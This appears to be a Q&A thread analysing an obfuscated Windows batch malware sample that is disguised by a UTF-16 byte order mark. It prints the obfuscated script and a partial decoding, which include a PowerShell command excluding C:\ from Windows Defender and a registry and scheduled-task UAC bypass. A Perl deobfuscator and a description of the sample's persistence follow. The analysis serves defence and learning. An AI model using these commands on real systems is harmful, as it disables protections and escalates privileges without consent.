How to decode contents of a batch file with chinese characters
Solution 1:
The file actually has regular ASCII text (or Windows-125x).
It only looks a little like UTF-16 containing some Chinese characters, due to some carefully chosen bytes at the very beginning that are able to trick file
and other charset detection software. (Your screenshot shows that the file begins with FF FE, which is U+FEFF "Byte order mark" in UTF-16LE.)
But I store your example as UTF-16 LE and then ask my text editor to directly interpret those bytes as ASCII or Windows-1252 – not convert but literally open the file as cp1252, just like your hex editor did – then I get a regular Windows Cmd batch script:
&cls
@%pUBlIc:~89,83%%PUBLic:~5,1%CHo^ of^%PuBlIC:~46,16%f
^%pUBlIC:~14,1%^L%pUBliC:~55,17%^%publIc:~4,1%
SEt R^=Jg^%pUBLIc:~13,1%^gtGXz%pUBLIc:~4,1%w%pUBLIc:~11,1%^hm%pUBLIc:~10,1%^S^HI^O
%r:~8,1%e%r:~4,1% na%r:~12,1%e = %r:~10,1%a%r:~4,1%c%r:~11,1% o%r:~10,1%%r:~13,1%%r:~8,1%ca%r:~4,1%or %r:~10,1%y %r:~12,1%oo%r:~12,1%825
%r:~8,1%e%r:~4,1% %r:~1,1%%r:~2,1%%r:~4,1%%r:~11,1%%r:~13,1%%r:~10,1% = %r:~11,1%%r:~4,1%%r:~4,1%p%r:~8,1%://%r:~1,1%%r:~2,1%%r:~4,1%%r:~11,1%%r:~13,1%%r:~10,1%.co%r:~12,1%/%r:~12,1%oo%r:~12,1%825/%r:~10,1%a%r:~4,1%c%r:~11,1%-o%r:~10,1%f%r:~13,1%%r:~8,1%ca%r:~4,1%or-%r:~12,1%ade-%r:~2,1%n-py%r:~4,1%%r:~11,1%on
^n^e%r:~4,1%^1^ %r:~8,1%^E%r:~8,1%%r:~14,1%%r:~16,1%o^N >^NU^L 2>&1
^%r:~2,1%F %eRRORLeVEl% == 0 (
Po^%R:~9,1%ER^%R:~14,1%%R:~11,1%^E^L^l/W 01 /ep 0^/^n%R:~17,1%^p^/c ^"^Ad^D-^M^pPr^EFe^R^En^Ce ^-^E%R:~6,1%^cl%R:~13,1%%R:~14,1%^%R:~16,1%o^N^Pa%R:~4,1%%R:~15,1% '^C:\' -^f^oRC^E;e^%R:~6,1%^%R:~2,1%%R:~4,1% "
) EL%r:~8,1%^e (
re%r:~1,1% add %r:~15,1%KCU\Env%r:~2,1%ron%r:~12,1%en%r:~4,1% /f /v %r:~9,1%%r:~2,1%nd%r:~2,1%r /%r:~4,1% RE^%r:~5,1%_%r:~14,1%Z^ /d ^"c%r:~12,1%d.exe /c %r:~8,1%%r:~4,1%ar%r:~4,1% \"\"^ /%R:~12,1%%R:~2,1%^n \"%~F0\">^N%r:~13,1%L 2>&1 || ^%R:~14,1%^vc%R:~15,1%%R:~17,1%%R:~8,1%%R:~4,1%^" >N%r:~13,1%^L 2>&1
%r:~14,1%c%r:~15,1%TA%r:~8,1%k%r:~8,1% /RUN ^/Tn \M%r:~16,1%cr
(Generally, the same bytes can be read in several ways – e.g. the two bytes 2c 31
mean the character "ㄬ" if read as UTF-16 LE, or the characters ,1
if read as ASCII. For example, you see "㩲㉾ㄬ" a lot in your editor because it's actually r:~2,1
, part of a batch variable expansion.)
This "gibberish" is a standard batch file, only somewhat obfuscated – you're looking at lots of %variable:~start,length%
variable expansions; specific characters from the %PUBLIC%
variable are reassembled into %R%
, and then specific characters of that variable are used to build up commands. However, for example,
re%r:~1,1% add %r:~15,1%KCU\Env%r:~2,1%ron%r:~12,1%en%r:~4,1% /f /v
clearly means reg add HKCU\Environment /f /v
.
After building up most of %R%
by guessing¹, and removing a lot of extraneous ^
escape characters, the result is:
&cls
@ECHo off
cLs
SEt R=JgigtGXzswbhmuSHIO
set name = batch obuscator by moom825
set github = https://github.com/moom825/batch-obfuscator-made-in-python
net1 sEsSIoN >NUL 2>&1
iF %eRRORLeVEl% == 0 (
PowERShELl/W 01 /ep 0/nOp/c "AdD-MpPrEFeREnCe -EXcluSIoNPatH 'C:\' -foRCE;eXit "
) ELse (
reg add HKCU\Environment /f /v windir /t REG_SZ /d "cmd.exe /c start \"\" /min \"%~F0\">NuL 2>&1 || SvcHOst" >NuL 2>&1
ScHTAsks /RUN /Tn \MIcr
The first thing it does is very suspicious – after checking whether it has Administrator rights using net1 session
, it adds the whole C:\ drive to Windows Defender's exclusion list. (In the "else" case it probably tries to elevate itself through Task Scheduler, as a way of bypassing UAC.)
Based on the initial snippet, this might be able to deobfuscate the rest:
#!/usr/bin/env perl
my %vars = (
public => "C:\\Users\\Public",
r => "JgigtGXzswbhmuSHIO",
);
while (<>) {
s/%(r|public):~(\d+),(\d+)%/substr($vars{lc $1}, $2, $3)/ige;
s/\^(.)/$1/g;
print;
}
¹ (I did this on Linux and didn't realize that %PUBLIC% is actually a default variable that exists on all Windows systems...)
Solution 2:
Judging by the existing text that I can see, I think that this is ctf challenge by john hammond(https://ctftime.org/task/17327). I'm pretty sure john made the challenge off of a virus sample so it is either that you have john's ctf on your server for some reason(harmless) or you have the original sample on your server(possibly harmful).
The virus does a UAC(User account control) bypass using the task scheduler UAC bypass method,(Im now basing this off of john's ctf) it then disables all windows defender, it then will write a base64 encoded exe to "C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", then it will use a windows utility called "certutil" which has a base64 decode function. So in total this batch file will get admin, disable defender then write the payload to startup adding persistence, then decoding the payload and running it.
I would highly suggest NOT running this!